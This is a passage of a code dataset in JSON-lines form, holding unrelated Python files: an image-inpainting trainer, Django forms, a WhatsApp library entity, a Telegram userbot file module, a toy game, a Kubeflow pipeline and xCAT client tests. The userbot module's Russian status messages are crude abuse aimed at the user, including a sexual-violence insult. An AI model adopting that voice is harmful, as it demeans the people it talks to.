x,y\n\n\nif __name__ == \"__main__\":\n t = twolink(15, 15)\n f1 = func1()\n f2 = func2()\n\n # Plot function one\n t.plot(f1)\n ikf1 = t.ik(f1[0], f1[1])\n # Plot the arm movement\n t.plot(ikf1)\n\n # Plot function one\n t.plot(f2)\n ikf2 = t.ik(f2[0], f2[1])\n # Plot the arm movement\n t.plot(ikf2)\n ","sub_path":"HW1/Problem10.py","file_name":"Problem10.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"200756881","text":"import enum\nimport os\nimport time\n\nimport numpy as np\nimport tensorflow as tf\nimport tqdm\nfrom scipy import misc\n\nimport losses\nimport masking\nimport vgg\nfrom layers import unet_layers, common_layers\nfrom utils import image_utils\nfrom utils import input_utils\n\n\nclass ModelPlaceholder(enum.Enum):\n MASK_CONV1 = 0,\n MASK_CONV2 = 1,\n MASK_CONV3 = 2,\n MASK_CONV4 = 3,\n MASK_CONV5 = 4,\n MASK_CONV6 = 5,\n MASK_CONV7 = 6,\n MASK_CONV8 = 7,\n\n MASK_MERGE_CONVD0 = 8,\n MASK_MERGE_CONVD1 = 9,\n MASK_MERGE_CONVD2 = 10,\n MASK_MERGE_CONVD3 = 11,\n MASK_MERGE_CONVD4 = 12,\n MASK_MERGE_CONVD5 = 13,\n MASK_MERGE_CONVD6 = 14,\n MASK_MERGE_CONVD7 = 15,\n\n MASK_ORIGINAL = 16,\n\n MASK_UP0 = 17,\n MASK_UP1 = 18,\n MASK_UP2 = 19,\n MASK_UP3 = 20,\n MASK_UP4 = 21,\n MASK_UP5 = 22,\n MASK_UP6 = 23,\n MASK_UP7 = 24,\n\n MASK_UP_NEW0 = 25,\n MASK_UP_NEW1 = 26,\n MASK_UP_NEW2 = 27,\n MASK_UP_NEW3 = 28,\n MASK_UP_NEW4 = 29,\n MASK_UP_NEW5 = 30,\n MASK_UP_NEW6 = 31,\n MASK_UP_NEW7 = 32,\n\n MASK_NEW1 = 33,\n MASK_NEW2 = 34,\n MASK_NEW3 = 35,\n MASK_NEW4 = 36,\n MASK_NEW5 = 37,\n MASK_NEW6 = 38,\n MASK_NEW7 = 39,\n MASK_NEW8 = 40,\n\n IMAGE_MASK = 41,\n IMAGE_GROUND_TRUTH = 42\n\n\ndef add_losses_to_summary(total_loss):\n tf.summary.scalar('total_loss', total_loss[0])\n tf.summary.scalar('hole_loss', total_loss[1])\n tf.summary.scalar('valid_loss', total_loss[2])\n tf.summary.scalar('perceptual_loss', total_loss[3])\n tf.summary.scalar('style_out_loss', total_loss[4])\n tf.summary.scalar('style_comp_loss', total_loss[5])\n tf.summary.scalar('total_variance_loss', total_loss[6])\n summaries = tf.summary.merge_all()\n return summaries\n\n\ndef get_comp_image(output_image, original_image, original_mask):\n return original_mask * original_image + (\n tf.add(tf.multiply(original_mask, -1), 1)) * ((output_image + 1) * 127.5)\n\n\nclass ImageInpainting:\n\n def __init__(self, im_path, vgg_path, num_epoch, logdir, save_path,\n mask_path):\n self.images_dir = [im_path + im_name for im_name in os.listdir(im_path)]\n self.total_ims = len(self.images_dir)\n self.vgg_path = vgg_path\n self.logdir = logdir\n self.save_path = save_path\n self.batch = 1\n self.num_epochs = num_epoch\n self.vgg_layer = ['pool1', 'pool2', 'pool3']\n self.masks = input_utils.get_masks(mask_path)\n\n self.masks_downsampling = masking.downsampling_all_masks(self.masks)\n self.masks_upsampling = masking.upsampling_all_masks(\n self.masks_downsampling, self.masks)\n\n holder_names = ['mask_conv1', 'mask_conv2', 'mask_conv3', 'mask_conv4',\n 'mask_conv5', 'mask_conv6', 'mask_conv7', 'mask_conv8',\n 'mask_merge_convd0', 'mask_merge_convd1',\n 'mask_merge_convd2', 'mask_merge_convd3',\n 'mask_merge_convd4', 'mask_merge_convd5',\n 'mask_merge_convd6', 'mask_merge_convd7', 'mask_original',\n 'mask_up0', 'mask_up1', 'mask_up2', 'mask_up3', 'mask_up4',\n 'mask_up5', 'mask_up6', 'mask_up7', 'mask_up_new0',\n 'mask_up_new1', 'mask_up_new2', 'mask_up_new3',\n 'mask_up_new4', 'mask_up_new5', 'mask_up_new6',\n 'mask_up_new7', 'new_mask1', 'new_mask2', 'new_mask3',\n 'new_mask4', 'new_mask5', 'new_mask6', 'new_mask7',\n 'new_mask8', 'image_mask', 'image_gt']\n holder_shapes = [[1, 256, 256, 1], [1, 128, 128, 1], [1, 64, 64, 1],\n [1, 32, 32, 1], [1, 16, 16, 1], [1, 8, 8, 1], [1, 4, 4, 1],\n [1, 2, 2, 1], [1, 512, 512, 1], [1, 256, 256, 1],\n [1, 128, 128, 1], [1, 64, 64, 1], [1, 32, 32, 1],\n [1, 16, 16, 1], [1, 8, 8, 1], [1, 4, 4, 1],\n [1, 512, 512, 1], [1, 512, 512, 1], [1, 256, 256, 1],\n [1, 128, 128, 1], [1, 64, 64, 1], [1, 32, 32, 1],\n [1, 16, 16, 1], [1, 8, 8, 1], [1, 4, 4, 1],\n [1, 512, 512, 1], [1, 256, 256, 1], [1, 128, 128, 1],\n [1, 64, 64, 1], [1, 32, 32, 1], [1, 16, 16, 1],\n [1, 8, 8, 1], [1, 4, 4, 1], [1, 256, 256, 1],\n [1, 128, 128, 1], [1, 64, 64, 1], [1, 32, 32, 1],\n [1, 16, 16, 1], [1, 8, 8, 1], [1, 4, 4, 1], [1, 2, 2, 1],\n [1, 512, 512, 3], [1, 512, 512, 3]]\n holder_dtype = [tf.float32, tf.float32, tf.float32, tf.float32, tf.float32,\n tf.float32, tf.float32, tf.float32, tf.float32, tf.float32,\n tf.float32, tf.float32, tf.float32, tf.float32, tf.float32,\n tf.float32, tf.float32, tf.float32, tf.float32, tf.float32,\n tf.float32, tf.float32, tf.float32, tf.float32, tf.float32,\n tf.float32, tf.float32, tf.float32, tf.float32, tf.float32,\n tf.float32, tf.float32, tf.float32, tf.float32, tf.float32,\n tf.float32, tf.float32, tf.float32, tf.float32, tf.float32,\n tf.float32, tf.float32, tf.float32]\n self.holder = list(\n map(tf.placeholder, holder_dtype, holder_shapes, holder_names))\n\n self.placeholders = dict(zip(ModelPlaceholder, self.holder))\n print(self.placeholders)\n\n def get_all_mask(self, with_mask, with_gt, image_path):\n # original_mask = masking.get_original_mask(with_mask) FIXME be aware that this function generates a slighlty different mask!\n # new_masks, conv_masks = masking.downsampling(original_mask)\n #\n # up_masks, up_masks_new, mask_merge_convd = masking.upsampling(new_masks,\n # original_mask)\n original_mask = masking.get_original_mask_from_id(self.masks, image_path)\n\n image_id = image_path.split('.jpg')[0][-1]\n mask_id = str(image_id)\n\n new_masks, conv_masks = self.masks_downsampling[mask_id]\n\n up_masks, up_masks_new, mask_merge_convd = self.masks_upsampling[mask_id]\n\n self.all_masks = [conv_masks['Mask_conv1'],\n conv_masks['Mask_conv2'],\n conv_masks['Mask_conv3'],\n conv_masks['Mask_conv4'],\n conv_masks['Mask_conv5'],\n conv_masks['Mask_conv6'],\n conv_masks['Mask_conv7'],\n conv_masks['Mask_conv8'],\n mask_merge_convd['Mask_merge_convd0'],\n mask_merge_convd['Mask_merge_convd1'],\n mask_merge_convd['Mask_merge_convd2'],\n mask_merge_convd['Mask_merge_convd3'],\n mask_merge_convd['Mask_merge_convd4'],\n mask_merge_convd['Mask_merge_convd5'],\n mask_merge_convd['Mask_merge_convd6'],\n mask_merge_convd['Mask_merge_convd7'],\n original_mask,\n up_masks['Mask_up0'],\n up_masks['Mask_up1'],\n up_masks['Mask_up2'],\n up_masks['Mask_up3'],\n up_masks['Mask_up4'],\n up_masks['Mask_up5'],\n up_masks['Mask_up6'],\n up_masks['Mask_up7'],\n up_masks_new['Mask_up_new0'],\n up_masks_new['Mask_up_new1'],\n up_masks_new['Mask_up_new2'],\n up_masks_new['Mask_up_new3'],\n up_masks_new['Mask_up_new4'],\n up_masks_new['Mask_up_new5'],\n up_masks_new['Mask_up_new6'],\n up_masks_new['Mask_up_new7'],\n new_masks['new_Mask1'],\n new_masks['new_Mask2'],\n new_masks['new_Mask3'],\n new_masks['new_Mask4'],\n new_masks['new_Mask5'],\n new_masks['new_Mask6'],\n new_masks['new_Mask7'],\n new_masks['new_Mask8'],\n with_mask, with_gt]\n\n def U_net(self, masked_image):\n kernel_sizes = [7, 5, 3, 3, 3, 3, 3, 3]\n channel_sizes = [64, 128, 256, 512, 512, 512, 512, 512]\n stride = 2\n\n masked_image = image_utils.norm_image(masked_image)\n\n with tf.variable_scope('UNET'):\n contraction_path = self._u_net_contracting_path(masked_image,\n kernel_sizes,\n channel_sizes, stride)\n conv_up0 = self._u_net_expansive_path(masked_image, contraction_path,\n channel_sizes)\n output_image = common_layers.tanh('conv_up0relu', conv_up0)\n\n # tf.summary.image('input_image', masked_image)\n # tf.summary.image('output_image', output_image)\n return output_image\n\n def _u_net_contracting_path(self, x, kernel_sizes, channel_sizes, stride):\n conv1 = common_layers.conv_down('conv1', x, kernel_sizes[0],\n channel_sizes[0],\n stride, self.placeholders[\n ModelPlaceholder.MASK_ORIGINAL],\n self.placeholders[\n ModelPlaceholder.MASK_CONV1],\n self.placeholders[\n ModelPlaceholder.MASK_NEW1])\n\n conv_relu_dict = dict()\n conv_relu_dict['conv1_relu'] = common_layers.relu('conv1_relu', conv1)\n\n for i in range(2, 7):\n conv_relu_dict['conv{}_relu'.format(i)] = unet_layers.conv_relu_down(\n 'conv{}'.format(i), conv_relu_dict['conv{}_relu'.format(i - 1)],\n kernel_sizes[i - 1], channel_sizes[i - 1], self.holder[31 + i],\n self.holder[i - 1], self.holder[32 + i])\n\n conv7 = common_layers.conv_down('conv7', conv_relu_dict['conv6_relu'],\n kernel_sizes[6], channel_sizes[6],\n stride,\n self.holder[38], self.holder[6],\n self.holder[39])\n conv7_bn = common_layers.instance_norm('conv7_ins', conv7, self.holder[32])\n conv_relu_dict['conv7_relu'] = common_layers.relu('conv7_relu', conv7_bn)\n\n conv8 = common_layers.conv_down('conv8', conv_relu_dict['conv7_relu'],\n kernel_sizes[7], channel_sizes[7],\n stride,\n self.holder[39], self.holder[7],\n self.holder[40])\n conv_relu_dict['conv8_relu'] = common_layers.relu('conv8_relu', conv8)\n\n return conv_relu_dict\n\n def _u_net_expansive_path(self, x, conv_relu_dict, channel_sizes):\n expansive_path = dict()\n\n expansive_path['conv_up7relu'] = unet_layers.conv_relu_up('conv_up7',\n conv_relu_dict[\n 'conv8_relu'],\n self.holder[\n 24],\n conv_relu_dict[\n 'conv7_relu'],\n self.holder[\n 39],\n self.holder[\n 15],\n self.holder[\n 32], 3, 512, 1)\n\n for i in reversed(range(1, 7)):\n layer_name = 'conv_up{}relu'.format(i)\n conv_layer_name = 'conv_up{}'.format(i)\n prev_up_conv_layer = 'conv_up{}relu'.format(i + 1)\n mirror_conv_layer = 'conv{}_relu'.format(i)\n\n expansive_path[layer_name] = unet_layers.conv_relu_up(conv_layer_name,\n expansive_path[\n prev_up_conv_layer],\n self.holder[\n 17 + i],\n conv_relu_dict[\n mirror_conv_layer],\n self.holder[\n 32 + i],\n self.holder[\n 8 + i],\n self.holder[\n 25 + i],\n 3,\n channel_sizes[\n i - 1],\n 1)\n\n conv_up0 = common_layers.conv_up('conv_up0',\n expansive_path['conv_up1relu'],\n self.holder[17], x,\n self.holder[16], self.holder[8],\n self.holder[25],\n 3, 3, 1)\n return conv_up0\n\n def train(self):\n with tf.Session() as sess:\n output_image = self.U_net(self.placeholders[ModelPlaceholder.IMAGE_MASK])\n\n gt_normalized = image_utils.norm_image(\n self.placeholders[ModelPlaceholder.IMAGE_GROUND_TRUTH])\n\n comp_image = get_comp_image(output_image,\n self.placeholders[\n ModelPlaceholder.IMAGE_GROUND_TRUTH],\n self.placeholders[\n ModelPlaceholder.MASK_ORIGINAL])\n\n comp_image_normalized = image_utils.norm_image(comp_image)\n vgg_net = vgg.VggNet(self.vgg_path, self.vgg_layer)\n\n gt_features, output_image_features, comp_image_features = vgg_net.high_level_features(\n gt_normalized,\n output_image,\n comp_image_normalized) # TODO in original version output_im was not resized?\n\n U_vars = [var for var in tf.trainable_variables() if 'UNET' in var.name]\n total_loss = losses.total_loss(output_image,\n gt_normalized,\n self.placeholders[\n ModelPlaceholder.MASK_ORIGINAL],\n output_image_features,\n gt_features,\n comp_image_features,\n self.vgg_layer,\n image_utils.resize_image(comp_image))\n optim = tf.train.AdamOptimizer()\n optimizer = optim.minimize(total_loss[0], var_list=U_vars)\n\n summaries = add_losses_to_summary(total_loss)\n\n int_group = tf.group(tf.global_variables_initializer(),\n tf.local_variables_initializer())\n sess.run(int_group)\n\n graph = tf.summary.FileWriter(self.logdir, sess.graph)\n saver = tf.train.Saver(U_vars, max_to_keep=20)\n\n global_step = 0\n for epoch in tqdm.tqdm(range(self.num_epochs), desc=\"Epochs\"):\n tqdm_batches = tqdm.tqdm(range(int(self.total_ims // self.batch)),\n desc=\"Batches\", leave=False)\n\n for image_id in tqdm_batches:\n start_time = time.time()\n global_step += 1\n image_file_name = self.images_dir[image_id]\n gt_images, masked_images = input_utils.get_image(self.images_dir,\n image_id)\n\n self.get_all_mask(masked_images, gt_images, image_file_name)\n feed_dic = input_utils.get_feedict(self.all_masks, self.holder)\n summary, _, loss_total, output_img = sess.run(\n [summaries, optimizer, total_loss, output_image],\n feed_dict=feed_dic)\n\n if (int(epoch * self.total_ims) + image_id) % 1 == 0:\n batch_time = time.time() - start_time\n tqdm_batches.set_postfix(\n epoch='{}'.format(float(epoch)),\n total_loss='{:.2f}'.format(float(loss_total[0])),\n hole_loss='{:.2f}'.format(float(loss_total[1])),\n valid_loss='{:.2f}'.format(float(loss_total[2])),\n perceptual_loss='{:.2f}'.format(float(loss_total[3])),\n style_out_loss='{:.2f}'.format(float(loss_total[4])),\n style_comp_loss='{:.2f}'.format(float(loss_total[5])),\n tv_loss='{:.2f}'.format(float(loss_total[6])),\n batch_time='{:.2f}'.format(float(batch_time)))\n graph.add_summary(summary, global_step)\n\n if global_step % 5000 == 0:\n im_array = misc.imread(self.images_dir[image_id])\n oo = (output_img[0] + 1) * 127\n zeros = np.zeros([512, 1536, 3])\n zeros[:, :1024, :] = im_array\n zeros[:, 1024:, :] = oo\n\n image_path_out = \"{}/output-image-{}.jpg\".format(self.logdir,\n global_step)\n\n misc.imsave(image_path_out, zeros)\n\n if global_step % 5000 == 0:\n saver.save(sess, self.save_path + 'model.ckpt', global_step=epoch)\n","sub_path":"image_inpainting.py","file_name":"image_inpainting.py","file_ext":"py","file_size_in_byte":17733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"505771908","text":"from ckeditor_uploader.widgets import CKEditorUploadingWidget\r\nfrom django import forms\r\nfrom .models import PublicItem, ActionItem\r\nfrom mptt.forms import TreeNodeChoiceField\r\nfrom cities.models import Cities\r\nfrom suit.widgets import SuitDateWidget\r\n\r\n\r\nclass ActionForm(forms.ModelForm):\r\n\r\n class Meta:\r\n model = ActionItem\r\n fields = ['date_start', 'date_end', 'action_preview']\r\n widgets = {\r\n 'date_start': SuitDateWidget,\r\n 'date_end': SuitDateWidget,\r\n }\r\n\r\n\r\nclass PublicForm(forms.ModelForm):\r\n text = forms.CharField(label='Текст публикации', widget=CKEditorUploadingWidget(), required=False)\r\n #id_city = TreeNodeChoiceField(label='Регион', queryset=Cities.objects.all(), level_indicator=u' -- ')\r\n class Meta:\r\n model = PublicItem\r\n fields = ['text', 'title', 'slug', 'id_rubric', 'id_city',]\r\n widgets = {\r\n 'id_rubric': forms.Select(attrs={'class': 'input-xlarge'}),\r\n 'title': forms.TextInput(attrs={'class': 'input-xxlarge'}),\r\n 'description': forms.Textarea(attrs={'rows': 5, 'class': 'input-xxlarge'})\r\n }","sub_path":"publications/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"574821207","text":"from yowsup.structs import ProtocolEntity, ProtocolTreeNode\nfrom .message_media_downloadable import DownloadableMediaMessageProtocolEntity\nfrom .builder_message_media_downloadable import DownloadableMediaMessageBuilder\nfrom yowsup.layers.protocol_messages.proto.wa_pb2 import ImageMessage, DocumentMessage\nfrom yowsup.common.tools import ImageTools\n\nclass DocumentDownloadableMediaMessageProtocolEntity(DownloadableMediaMessageProtocolEntity):\n '''\n \n {{THUMBNAIL_RAWDATA (JPEG?)}}\n \n \n '''\n\n def __init__(self, mimeType, fileHash, url, title, size, fileName, pages, mediaKey=None, _id=None, _from=None,\n to=None, notify=None, timestamp=None, participant=None, preview=None, offline=None, retry=None):\n super(DocumentDownloadableMediaMessageProtocolEntity, self).__init__(\"document\",\n mimeType, fileHash, url, None, size,\n fileName, mediaKey,\n _id, _from, to, notify, timestamp,\n participant, preview, offline, retry)\n self.setImageProps(title, pages)\n\n\n def __str__(self):\n out = super(DocumentDownloadableMediaMessageProtocolEntity, self).__str__()\n out= \"Title: %s\\n\" % self.title\n out= \"Pages: %s\\n\" % str(self.pages)\n return out\n\n def setDocumentProps(self, title, pages):\n self.pages = int(pages)\n self.title = title\n self.cryptKeys = '576861747341707020446f63756d656e74204b657973'\n\n def getTitle(self):\n return self.title\n\n def toProtocolTreeNode(self):\n node = super(DocumentDownloadableMediaMessageProtocolEntity, self).toProtocolTreeNode()\n mediaNode = node.getChild(\"enc\")\n mediaNode.setAttribute(\"title\", self.title)\n mediaNode.setAttribute(\"pages\", str(self.pages))\n\n return node\n\n def toProtobufMessage(self):\n document_message = DocumentMessage()\n document_message.url = self.url\n document_message.width = self.width\n document_message.height = self.height\n document_message.mime_type = self.mimeType\n document_message.file_sha256 = self.fileHash\n document_message.file_length = self.size\n document_message.caption = self.caption\n document_message.jpeg_thumbnail = self.preview\n document_message.media_key = self.mediaKey\n\n return document_message\n\n @staticmethod\n def fromProtocolTreeNode(node):\n entity = DownloadableMediaMessageProtocolEntity.fromProtocolTreeNode(node)\n entity.__class__ = DocumentDownloadableMediaMessageProtocolEntity\n mediaNode = node.getChild(\"media\")\n entity.setDocumentProps(\n mediaNode.getAttributeValue(\"title\"),\n mediaNode.getAttributeValue(\"pages\")\n )\n return entity","sub_path":"venv/lib/python3.5/site-packages/yowsup/layers/protocol_media/protocolentities/message_media_downloadable_document.py","file_name":"message_media_downloadable_document.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"394653399","text":"# азазаза блять ьу нахуй\nfrom telethon import events\nfrom .. import loader, utils\n\n\n@loader.tds\nclass DownloaderahahMod(loader.Module):\n \"\"\"Загрузка файлов\"\"\" \n strings = {\"name\": \"Загрузка файлов\"}\n\n @loader.unrestricted\n async def downhcmd(self, event):\n user_msg = \"\"\"{}\"\"\".format(utils.get_args_raw(event))\n reply = await event.get_reply_message()\n if not reply:\n await event.edit(\"Реплай дура тупая\")\n return\n if not reply.file:\n await event.edit(\"Реплай на медиа конченая скатина и не забудь еще сука ввести имя и расширение написать (опционально) тупая сука блядина ебаная твою маму насиловал\")\n return\n await reply.download_media(f'{user_msg}')\n await event.edit(\"Тот хентай который ты скачал уже отправился твоей мамке\")\n \n @loader.unrestricted\n async def uplhcmd(self, event):\n user_msg = \"\"\"{}\"\"\".format(utils.get_args_raw(event))\n if not user_msg:\n await event.edit(\"А путь и нахуя ты поставил этот модуль?\")\n return\n await event.client.send_file(event.chat_id, f'{user_msg}')\n","sub_path":"downh.py","file_name":"downh.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"449735934","text":"\"\"\"\"\n1.一个回合制游戏,每个角色都有hp和power,hp代表血量,power代表攻击力,\nhp的初始值为1000,power的初始值为200\n2.定义一个fight方法:\n3.my_hp = hp - enemy_power\n4.enemy_final_hp = enemy_hp - my_power\n5.两个hp进行对比,血量剩余多的人获胜\n\"\"\"\n\n\nclass Game:\n def __init__(self, my_hp, enemy_hp): # 构造函数\n self.my_hp = my_hp\n self.my_power = 200\n self.enemy_hp = enemy_hp\n self.enemy_power = 200\n\n def fight(self):\n while True:\n # 血量计算公式\n self.my_hp = self.my_hp - self.enemy_power\n self.enemy_hp = self.enemy_hp - self.my_power\n print(f\"我的血量:{self.my_hp}\\n敌人的血量:{self.enemy_hp}\")\n # 三目表达式\n # print(\"我赢了!\") if my_hp > enemy_final_hp else print(\"对方胜利!\")\n if self.my_hp > self.enemy_hp:\n print(\"我赢了!\")\n break\n else:\n print(\"对方胜利!\")\n break\n\n @staticmethod\n def back_home():\n print(\"回城~\")\n\n\n# Hero类继承Game类,多了一个防御力的参数\nclass Hero(Game):\n def __init__(self, my_hp, enemy_hp): # 继承父类时父类的参数在此处输入\n super(Hero, self).__init__(my_hp, enemy_hp) # 继承父类__init__\n self.defense = 100\n\n def fight(self): # hero自身的比赛规则(因为多了一个防御力,故比赛规则与父类不同,需要制定自身的比赛规则)\n while True:\n # 血量计算公式\n self.my_hp = self.my_hp + self.defense - self.enemy_power\n self.enemy_hp = self.enemy_hp - self.my_power\n print(f\"我的血量:{self.my_hp}\\n敌人的血量:{self.enemy_hp}\")\n # 三目表达式\n # print(\"我赢了!\") if my_hp > enemy_final_hp else print(\"对方胜利!\")\n if self.my_hp > self.enemy_hp:\n print(\"我赢了!\")\n break\n else:\n print(\"对方胜利!\")\n break\n\n\n# 调用\n# 实例化类\n# game1 = Game()\n# game1.fight()\nhero1 = Hero(1000, 200)\nhero1.fight()\nhero1.back_home()\n","sub_path":"Script_exercise/python_code/grabble_game/garbble_game.py","file_name":"garbble_game.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"280930092","text":"# Copyright 2018 The Kubeflow Authors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport kfp.deprecated.dsl as dsl\n\n\n@dsl.graph_component\ndef echo1_graph_component(text1):\n dsl.ContainerOp(\n name='echo1-task1',\n image='library/bash:4.4.23',\n command=['sh', '-c'],\n arguments=['echo \"$0\"', text1])\n\n\n@dsl.graph_component\ndef echo2_graph_component(text2):\n dsl.ContainerOp(\n name='echo2-task1',\n image='library/bash:4.4.23',\n command=['sh', '-c'],\n arguments=['echo \"$0\"', text2])\n\n\n@dsl.pipeline()\ndef opsgroups_pipeline(text1='message 1', text2='message 2'):\n step1_graph_component = echo1_graph_component(text1)\n step2_graph_component = echo2_graph_component(text2)\n step2_graph_component.after(step1_graph_component)\n","sub_path":"sdk/python/tests/compiler/testdata/opsgroups.py","file_name":"opsgroups.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"315273921","text":"# Copyright 2017 IBM Corp.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nimport mock\nimport os\nimport shutil\nimport tarfile\nimport xml\n\n\nfrom zvmsdk import constants as const\nfrom zvmsdk import exception\nfrom zvmsdk import utils as zvmutils\nfrom zvmsdk import xcatclient\nfrom zvmsdk import config\nfrom zvmsdk.tests.unit import base\n\n\nCONF = config.CONF\n\n\nclass SDKXCATClientTestCases(base.SDKTestCase):\n \"\"\"Test cases for xcat zvm client.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n super(SDKXCATClientTestCases, cls).setUpClass()\n cls.old_client_type = CONF.zvm.client_type\n base.set_conf('zvm', 'client_type', 'xcat')\n\n @classmethod\n def tearDownClass(cls):\n base.set_conf('zvm', 'client_type', cls.old_client_type)\n super(SDKXCATClientTestCases, cls).tearDownClass()\n\n def setUp(self):\n self._xcatclient = xcatclient.XCATClient()\n self._xcat_url = xcatclient.get_xcat_url()\n self._pathutils = zvmutils.PathUtils()\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_power_state(self, xrequest):\n fake_userid = 'fake_userid'\n fake_url = self._xcat_url.rpower('/' + fake_userid)\n fake_body = ['on']\n self._xcatclient._power_state(fake_userid, 'PUT', 'on')\n xrequest.assert_called_once_with('PUT', fake_url, fake_body)\n\n @mock.patch.object(xcatclient.XCATClient, '_power_state')\n def test_guest_start(self, power_state):\n fake_userid = 'fake_userid'\n self._xcatclient.guest_start(fake_userid)\n power_state.assert_called_once_with(fake_userid, 'PUT', 'on')\n\n @mock.patch.object(xcatclient.XCATClient, '_power_state')\n def test_guest_stop(self, power_state):\n fake_userid = 'fakeuser'\n self._xcatclient.guest_stop(fake_userid)\n power_state.assert_called_once_with(fake_userid, 'PUT', 'off')\n\n @mock.patch.object(xcatclient.XCATClient, '_power_state')\n def test_get_power_state(self, power_state):\n fake_userid = 'fake_userid'\n fake_ret = {'info': [[fake_userid + ': on\\n']],\n 'node': [],\n 'errocode': [],\n 'data': []}\n power_state.return_value = fake_ret\n ret = self._xcatclient.get_power_state(fake_userid)\n\n power_state.assert_called_once_with(fake_userid, 'GET', 'stat')\n self.assertEqual('on', ret)\n\n def _fake_host_rinv_info(self):\n fake_host_rinv_info = [\"fakenode: z/VM Host: FAKENODE\\n\"\n \"fakenode: zHCP: fakehcp.fake.com\\n\"\n \"fakenode: CEC Vendor: FAKE\\n\"\n \"fakenode: CEC Model: 2097\\n\"\n \"fakenode: Hypervisor OS: z/VM 6.1.0\\n\"\n \"fakenode: Hypervisor Name: fakenode\\n\"\n \"fakenode: Architecture: s390x\\n\"\n \"fakenode: LPAR CPU Total: 10\\n\"\n \"fakenode: LPAR CPU Used: 10\\n\"\n \"fakenode: LPAR Memory Total: 16G\\n\"\n \"fakenode: LPAR Memory Offline: 0\\n\"\n \"fakenode: LPAR Memory Used: 16.0G\\n\"\n \"fakenode: IPL Time:\"\n \"IPL at 03/13/14 21:43:12 EDT\\n\"]\n return {'info': [fake_host_rinv_info, ]}\n\n def _fake_disk_info(self):\n fake_disk_info = [\"fakenode: FAKEDP Total: 406105.3 G\\n\"\n \"fakenode: FAKEDP Used: 367262.6 G\\n\"\n \"fakenode: FAKEDP Free: 38842.7 G\\n\"]\n return {'info': [fake_disk_info, ]}\n\n @mock.patch.object(xcatclient.XCATClient, '_construct_zhcp_info')\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_get_host_info(self, xrequest, _construct_zhcp_info):\n xrequest.return_value = self._fake_host_rinv_info()\n fake_zhcp_info = {'hostname': 'fakehcp.fake.com',\n 'nodename': 'fakehcp',\n 'userid': 'fakehcp'}\n _construct_zhcp_info.return_value = fake_zhcp_info\n host_info = self._xcatclient.get_host_info()\n self.assertEqual(host_info['zvm_host'], \"FAKENODE\")\n self.assertEqual(self._xcatclient._zhcp_info, fake_zhcp_info)\n url = \"/xcatws/nodes/\" + CONF.zvm.host +\\\n \"/inventory?userName=\" + CONF.xcat.username +\\\n \"&password=\" + CONF.xcat.password +\\\n \"&format=json\"\n xrequest.assert_called_once_with('GET', url)\n _construct_zhcp_info.assert_called_once_with(\"fakehcp.fake.com\")\n\n @mock.patch.object(xcatclient, 'xcat_request')\n def test_get_diskpool_info(self, xrequest):\n xrequest.return_value = self._fake_disk_info()\n dp_info = self._xcatclient.get_diskpool_info('FAKEDP')\n url = \"/xcatws/nodes/\" + CONF.zvm.host +\\\n \"/inventory?userName=\" + CONF.xcat.username +\\\n \"&password=\" + CONF.xcat.password +\\\n \"&format=json&field=--diskpoolspace&field=FAKEDP\"\n xrequest.assert_called_once_with('GET', url)\n self.assertEqual(dp_info['disk_total'], \"406105.3 G\")\n self.assertEqual(dp_info['disk_used'], \"367262.6 G\")\n self.assertEqual(dp_info['disk_available'], \"38842.7 G\")\n\n @mock.patch.object(xcatclient.XCATClient, 'get_host_info')\n @mock.patch.object(xcatclient.XCATClient, '_construct_zhcp_info')\n def test_get_hcp_info(self, _construct_zhcp_info, get_host_info):\n self._xcatclient._get_hcp_info()\n get_host_info.assert_called_once_with()\n self._xcatclient._get_hcp_info(\"fakehcp.fake.com\")\n _construct_zhcp_info.assert_called_once_with(\"fakehcp.fake.com\")\n\n @mock.patch.object(xcatclient.XCATClient, '_get_userid_from_node')\n def test_construct_zhcp_info(self, get_userid):\n get_userid.return_value = \"fkuserid\"\n hcp_info = self._xcatclient._construct_zhcp_info(\"fakehcp.fake.com\")\n get_userid.assert_called_once_with(\"fakehcp\")\n self.assertEqual(hcp_info['hostname'], \"fakehcp.fake.com\")\n self.assertEqual(hcp_info['nodename'], \"fakehcp\")\n self.assertEqual(hcp_info['userid'], \"fkuserid\")\n\n def _fake_vm_list(self):\n vm_list = ['#node,hcp,userid,nodetype,parent,comments,disable',\n '\"fakehcp\",\"fakehcp.fake.com\",\"HCP\",\"vm\",\"fakenode\"',\n '\"fakenode\",\"fakehcp.fake.com\",,,,,',\n '\"os000001\",\"fakehcp.fake.com\",\"OS000001\",,,,']\n return vm_list\n\n @mock.patch.object(xcatclient, 'xcat_request')\n @mock.patch.object(xcatclient.XCATClient, '_get_hcp_info')\n def test_get_vm_list(self, _get_hcp_info, xrequest):\n 